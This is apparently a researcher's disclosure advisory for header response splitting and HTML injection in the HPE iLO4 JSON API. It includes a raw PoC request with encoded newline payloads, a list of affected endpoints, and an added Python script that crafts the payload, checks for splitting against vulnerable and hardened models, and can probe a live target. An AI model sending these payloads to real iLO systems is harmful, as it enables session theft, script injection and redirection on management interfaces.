“HURT” – XSS / CSRF / DoS / Open Redirection / HTML Injection & HEADER Response Splitting in HPE iLO4
PLEASE CREDIT: Ken Pyle, Partner of CYBIR & Graduate Professor at Chestnut Hill College IN ALL REFERENCES TO THIS VULNERABILITY.
The HPE iLO 4 / IPMI based web application fails to properly sanitize input to its JSON based API: the value of the "_" query parameter that the UI appends to /json/ calls is reflected into the response without CR/LF or HTML filtering. This input field allows for a number of high severity attacks.
In the example supplied, the health_summary call is abused: percent-encoded newlines (%0a) and a fake header line are injected through the "_" parameter, so the reflected value breaks out into the response headers, and arbitrary encoded HTML can be injected by the same route. Additionally, the Host header is set to an arbitrary attacker-controlled value (cybirpoc.com in the PoC), which the application accepts without validation.
This results in a number of exploitable conditions:
CSRF / XSS / Session Riding / Token Theft / Client-Side Code Execution / Theft of Credentials / Denial of Service / Open redirection
PoC (Proof Of Concept) Request:
GET /json/(call)?null&_=%0aFAKE%20HEADER:%20CYBIRPOC.COM%0a%0a HTTP/1.1
Host: cybirpoc.com
Each %0a decodes server-side to a line feed: the first one terminates the header the value is reflected into, "FAKE HEADER: CYBIRPOC.COM" then appears as a header line of its own, and the trailing %0a%0a ends the header block, so whatever follows (the remaining server headers and the JSON body) is treated by the client as response body.
Sample PoC / Entry Points (each takes the same payload in the "_" parameter):
/json/health_summary?null&_=
/json/login_session?_=
/json/session_info?_=
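The following Python script is an added example, not part of the original advisory and not HPE's or CYBIR's code. It builds the PoC request above, decodes the "_" parameter the way a server-side query parser would, and checks a raw HTTP response for the tell-tale sign of header splitting: the injected header name starting a line of its own inside the header block. Because the check needs something to run against offline, the script also models a vulnerable server (decoded value copied straight into a response header; the header name X-Echo is hypothetical) and a hardened one that strips CR, LF and NUL before the value reaches a header. The probe() helper that talks to a live iLO is included for use on a real target and is not exercised by the offline checks.

```python
"""Probe and offline model for the iLO4 "_" parameter CRLF injection.

Added example (not from the advisory or from HPE). Assumptions: the reflected
input is the "_" query parameter of the /json/ endpoints, and a vulnerable
server copies its decoded value verbatim into a response header. The header
name X-Echo in the model below is hypothetical.
"""
import socket
import ssl
from urllib.parse import parse_qs, quote, urlsplit


def build_poc_request(host: str, call: str, header_name: str, header_value: str) -> bytes:
    """Raw HTTP/1.1 request in the shape of the advisory's PoC.

    The "_" parameter carries an LF-terminated fake header line followed by a
    blank line. Newlines are percent-encoded (%0A) so they survive URL parsing
    and are only decoded server-side.
    """
    payload = f"\n{header_name}: {header_value}\n\n"
    query = "null&_=" + quote(payload, safe=":")
    request = (
        f"GET /json/{call}?{query} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    )
    return request.encode("ascii")


def underscore_param(request: bytes) -> str:
    """Decode the "_" value exactly as a server-side query parser would."""
    request_line = request.split(b"\r\n", 1)[0].decode("ascii")
    target = request_line.split(" ")[1]
    fields = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return fields.get("_", [""])[0]


def vulnerable_response(underscore: str) -> bytes:
    """Models the flaw: the decoded parameter lands in a header unfiltered."""
    return (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: application/json\r\n"
        f"X-Echo: {underscore}\r\n"  # hypothetical header, no CR/LF check
        "Cache-Control: no-cache\r\n\r\n"
        '{"health":"OK"}'
    ).encode("latin-1")


def hardened_response(underscore: str) -> bytes:
    """Generic fix: CR, LF and NUL from user input never reach the header block.

    Rejecting the request with 400 is the stricter alternative; stripping is
    shown here so the reflected text stays visible for comparison.
    """
    clean = "".join(c for c in underscore if c not in "\r\n\0")
    return (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: application/json\r\n"
        f"X-Echo: {clean}\r\n"
        "Cache-Control: no-cache\r\n\r\n"
        '{"health":"OK"}'
    ).encode("latin-1")


def injected_header(response: bytes, header_name: str):
    """Return the injected header's value if it starts its own line inside the
    response header block (splitting succeeded), otherwise None.

    Only the block before the first blank line counts, so a value that is
    merely echoed in the JSON body is not reported as a split.
    """
    text = response.decode("latin-1").replace("\r\n", "\n")
    head = text.split("\n\n", 1)[0]
    prefix = header_name.lower() + ":"
    for line in head.split("\n")[1:]:
        if line.lower().startswith(prefix):
            return line[len(prefix):].strip()
    return None


def probe(host: str, port: int = 443, use_tls: bool = True, call: str = "health_summary",
          header_name: str = "FAKE HEADER", header_value: str = "CYBIRPOC.COM",
          timeout: float = 5.0):
    """Send the PoC to a live target and report the injected header value.

    Needs network access; not run by the offline checks. TLS verification is
    disabled because iLO typically presents a self-signed certificate.
    """
    request = build_poc_request(host, call, header_name, header_value)
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(65536)
            if not data:
                break
            chunks.append(data)
    return injected_header(b"".join(chunks), header_name)


if __name__ == "__main__":
    req = build_poc_request("cybirpoc.com", "health_summary", "FAKE HEADER", "CYBIRPOC.COM")
    value = underscore_param(req)
    print("vulnerable model:", injected_header(vulnerable_response(value), "FAKE HEADER"))
    print("hardened model:  ", injected_header(hardened_response(value), "FAKE HEADER"))
```

Against the vulnerable model the check returns "CYBIRPOC.COM" because the fake header occupies a line of its own in the header block; against the hardened model it returns None because the stripped value stays on the X-Echo line. The same injected_header() check applied to the output of probe() is the quickest way to confirm whether a given iLO build reflects the parameter unfiltered.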
PoC (Proof Of Concept) Screenshot:
#hpe #ilo #ipmi #bluemonday #rsac2022 #exploit #0day #vulnerability #iot #cybersecurity